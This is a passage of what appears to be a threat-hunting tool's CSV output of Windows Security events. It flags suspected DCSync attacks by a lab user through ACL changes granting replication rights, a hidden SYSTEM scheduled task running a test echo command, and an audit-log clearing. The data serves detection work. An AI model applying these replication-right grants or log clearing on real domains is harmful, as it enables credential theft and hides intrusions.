a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242598</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">77B63738-C25C-4FBD-BA96-A7ABE17A22A3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2020-09-02T11:47:48.959767Z"">
</TimeCreated>
<EventRecordID>2171293</EventRecordID>
<Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
</Correlation>
<Execution ProcessID=""632"" ThreadID=""4244"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""SubjectUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
<Data Name=""SubjectUserName"">a-jbrown</Data>
<Data Name=""SubjectDomainName"">3B</Data>
<Data Name=""SubjectLogonId"">0x21a8c68</Data>
<Data Name=""TaskName"">\LMST</Data>
<Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt;
&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
&lt;RegistrationInfo&gt;
&lt;Date&gt;2020-09-02T04:47:49.74-07:00&lt;/Date&gt;
&lt;Author&gt;a-jbrown&lt;/Author&gt;
&lt;Description&gt;00304d6e&lt;/Description&gt;
&lt;URI&gt;\LMST&lt;/URI&gt;
&lt;/RegistrationInfo&gt;
&lt;Triggers&gt;
&lt;TimeTrigger&gt;
&lt;StartBoundary&gt;2020-02-09T04:47:48&lt;/StartBoundary&gt;
&lt;EndBoundary&gt;2020-02-09T04:47:58&lt;/EndBoundary&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;/TimeTrigger&gt;
&lt;/Triggers&gt;
&lt;Principals&gt;
&lt;Principal id=&quot;Author&quot;&gt;
&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;
&lt;UserId&gt;SYSTEM&lt;/UserId&gt;
&lt;/Principal&gt;
&lt;/Principals&gt;
&lt;Settings&gt;
&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;
&lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt;
&lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt;
&lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt;
&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;
&lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt;
&lt;IdleSettings&gt;
&lt;Duration&gt;PT10M&lt;/Duration&gt;
&lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt;
&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;
&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;
&lt;/IdleSettings&gt;
&lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt;
&lt;Enabled&gt;true&lt;/Enabled&gt;
&lt;Hidden&gt;true&lt;/Hidden&gt;
&lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt;
&lt;WakeToRun&gt;false&lt;/WakeToRun&gt;
&lt;ExecutionTimeLimit&gt;PT72H&lt;/ExecutionTimeLimit&gt;
&lt;Priority&gt;7&lt;/Priority&gt;
&lt;/Settings&gt;
&lt;Actions Context=&quot;Author&quot;&gt;
&lt;Exec&gt;
&lt;Command&gt;cmd.exe&lt;/Command&gt;
&lt;Arguments&gt;/c echo testing &amp;gt; c:\users\public\out.txt&lt;/Arguments&gt;
&lt;/Exec&gt;
&lt;/Actions&gt;
&lt;/Task&gt;</Data>
</EventData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
</TimeCreated>
<EventRecordID>198242597</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""2868"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">30F197FC-BECA-48D6-923E-A52A437119D3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14674</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
</Provider>
<EventID>5136</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14081</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
</TimeCreated>
<EventRecordID>198242596</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""444"" ThreadID=""896"">
</Execution>
<Channel>Security</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security>
</Security>
</System>
<EventData>
<Data Name=""OpCorrelationID"">30F197FC-BECA-48D6-923E-A52A437119D3</Data>
<Data Name=""AppCorrelationID"">-</Data>
<Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
<Data Name=""SubjectUserName"">bob</Data>
<Data Name=""SubjectDomainName"">insecurebank</Data>
<Data Name=""SubjectLogonId"">0x40f2719</Data>
<Data Name=""DSName"">insecurebank.local</Data>
<Data Name=""DSType"">%%14676</Data>
<Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
<Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
<Data Name=""ObjectClass"">domainDNS</Data>
<Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
<Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
<Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
<Data Name=""OperationType"">%%14675</Data>
</EventData>
</Event>",DC1.insecurebank.local,Security
Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
</Provider>
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime=""2021-12-12T17:57:17.006377Z"">
</TimeCreated>
<EventRecordID>2982081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""472"" ThreadID=""4956"">
</Execution>
<Channel>Security</Channel>
<Computer>01566s-win16-ir.threebeesco.com</Computer>
<Security>
</Security>
</System>
<UserData>
<LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
<SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
<SubjectUserName>a-jbrown</SubjectUserName>
<SubjectDomainName>3B</SubjectDomainName>
<SubjectLogonId>0x364f7</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
